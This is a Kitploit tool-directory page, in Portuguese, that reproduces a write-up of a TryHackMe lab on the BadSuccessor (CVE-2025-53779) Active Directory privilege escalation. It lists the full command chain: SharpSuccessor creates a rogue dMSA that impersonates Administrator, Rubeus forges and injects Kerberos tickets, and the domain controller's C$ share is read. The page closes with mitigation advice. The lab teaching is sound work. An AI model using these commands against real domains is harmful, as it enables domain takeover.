Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Active-Directory-BadSuccessor — Uma sala TryHackme cobrindo a exploração do CVE-2025-53779 usando windows. | Kitploit
Ferramentas/GitHubGitHub/musa-xvi/active-directory-badsuccessor
Escalada de PrivilégiosReconhecimentoExploraçãoPós-ExploraçãoCTFTestes de PenetraçãoAutenticaçãoAprendizado e EducaçãoLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubmusa-xvi/active-directory-badsuccessor

Active-Directory-BadSuccessor

Uma sala TryHackme cobrindo a exploração do CVE-2025-53779 usando windows.

Ver Repositório
2há 3 mesesAinda não revisado

Active-Directory-BadSuccessor

Visão Geral

Nesta sala, exploramos a técnica de escalonamento de privilégios BadSuccessor, uma vulnerabilidade que abusa de Contas de Serviço Gerenciadas Delegadas (dMSAs) no Active Directory. O ataque permite que um usuário com controle suficiente sobre um objeto dMSA personifique outra conta e potencialmente alcance privilégios de Administrador de Domínio.

Informações da Sala

Sala: https://tryhackme.com/room/adbadsuccessor

Dificuldade: Média

Data: 05/06/2026

Versão: 1.0

Objetivo: Demonstrar como as Contas de Serviço Gerenciadas Delegadas podem ser abusadas para escalonar privilégios e comprometer um ambiente Active Directory.

Papel: Terry Byte (tbyte)

Meta: Avaliar a segurança de um ambiente Active Directory recém-implantado e determinar se ele é vulnerável ao ataque BadSuccessor.

Caminho do Ataque

O ataque consiste em duas fases principais:

  1. Reconhecimento.
  2. Escalonamento de Privilégios via Abuso de dMSA

Reconhecimento

Passo 1 - Conectar à Máquina Alvo

  • Conecte-se à estação de trabalho Windows fornecida usando RDP:
root@kitploit:~
xfreerdp /v:10.211.101.20 /u:tbyte /p:P\@SSw0rd345 /dynamic-resolution
  • Após a autenticação, abra o PowerShell.

Passo 2 - Navegar até o Diretório de Trabalho

  • Vá para o diretório da Prova de Conceito:

    root@kitploit:~
    cd C:\PoC
    
  • Verifique o conteúdo: dir

navegar_diretorio

Passo 3 - Obter o Script de Enumeração

  • Baixe o script PowerShell do repositório BadSuccessor da Akamai:
root@kitploit:~
https://github.com/akamai/BadSuccessor/blob/main/Get-BadSuccessorOUPermissions.ps1
  • Crie ou edite o script usando o Bloco de Notas:

notepad Get-BadSuccessorOUPermissions.ps1

  • Cole o conteúdo e salve o arquivo.
editar_script

Passo 4 - Enumerar Permissões de OU

  • Execute o script:
root@kitploit:~
 .\Get-BadSuccessorOUPermissions.ps1
enumerar_script
  • A saída revela contas cujas permissões podem potencialmente abusar de Contas de Serviço Gerenciadas Delegadas.
  • Identifique a terceira conta retornada pelo script.
  • Esta conta será usada durante a fase de escalonamento de privilégios.

Exploração Usando Windows

Passo 1 - Criar uma dMSA Maliciosa

  • Use o SharpSuccessor para criar uma Conta de Serviço Gerenciada Delegada que personifica a conta do Administrador:

    root@kitploit:~
    .\SharpSuccessor.exe add /path:"ou=LabOU,dc=tryhackme,dc=local" /account:tbyte /name:pentest_dmsa /impersonate:Administrator
    
    dMSA_maliciosa

O que Acontece?

  • A ferramenta cria um novo objeto dMSA e o configura para suceder a conta do Administrador.
  • Isso estabelece a base para o escalonamento de privilégios.

Passo 2 - Solicitar um TGT Kerberos

  • Use o Rubeus para obter um Tíquete de Concessão de Tíquete delegado (TGT):

    root@kitploit:~
    .\Rubeus.exe tgtdeleg /nowrap
    
    Kerberos TGT
  • O comando retorna um tíquete Kerberos codificado em Base64.

  • Copie o tíquete gerado.

Passo 3 - Personificar a Conta dMSA

  • Use o TGT delegado para solicitar um tíquete como a conta dMSA recém-criada:
root@kitploit:~
 .\Rubeus.exe asktgs /targetuser:pentest_dmsa$ /service:krbtgt/tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
Conta_dMSA

Resultado:

Um novo tíquete Kerberos é injetado na memória para a conta dMSA.

Passo 4 - Solicitar um Tíquete de Serviço como Administrador

  • Aproveite o tíquete dMSA para obter acesso aos serviços executados no contexto do Administrador:

    root@kitploit:~
    .\Rubeus.exe asktgs /user:pentest_dmsa$ /service:cifs/DC-LAB2025-01.tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
    
    tíquete-Admin

Resultado:

  • Um tíquete de serviço CIFS é carregado na memória.
  • Este tíquete fornece acesso a recursos que normalmente exigiriam privilégios de Administrador de Domínio.

Passo 5 - Acessar a Área de Trabalho do Administrador

  • Verifique o acesso elevado navegando pelo perfil do Administrador no Controlador de Domínio:
root@kitploit:~
 dir \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\
dMSA_maliciosa
  • A listagem bem-sucedida do diretório confirma o acesso em nível administrativo.

Passo 6 - Capturar a Flag

  • Leia a flag armazenada na área de trabalho do Administrador:

    root@kitploit:~
    Get-Content \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\flag.txt
    
    Flag
  • Flag obtida com sucesso.

Por que o BadSuccessor é Importante

O BadSuccessor demonstra como as Contas de Serviço Gerenciadas Delegadas podem introduzir caminhos de escalonamento de privilégios em ambientes Active Directory. O Active Directory serve como a espinha dorsal de identidade de muitas organizações; vulnerabilidades que afetam o Kerberos e a delegação de contas podem ter consequências graves.

Um atacante com permissões suficientes sobre um objeto dMSA pode:

  • Personificar usuários privilegiados
  • Obter tíquetes Kerberos elevados
  • Acessar recursos sensíveis
  • Escalonar privilégios para Administrador de Domínio
  • Potencialmente comprometer toda a floresta do Active Directory

Recomendações de Mitigação

Para mitigar o BadSuccessor (CVE-2025-53779), as organizações devem aplicar prontamente as atualizações de segurança da Microsoft, restringir e revisar as permissões de dMSA, monitorar atividades suspeitas do Kerberos, auditar relações de delegação e aplicar o princípio do menor privilégio. Revisões regulares das configurações de delegação do Active Directory podem ajudar a identificar e reduzir possíveis caminhos de escalonamento de privilégios.

Principais Aprendizados

Esta sala proporcionou uma valiosa experiência prática com:

  • Escalonamento de privilégios no Active Directory
  • Contas de Serviço Gerenciadas Delegadas (dMSAs)
  • Abuso de autenticação Kerberos
  • Operações de tíquetes com Rubeus
  • Exploração com SharpSuccessor
  • Técnicas de validação pós-exploração
Baixar ferramenta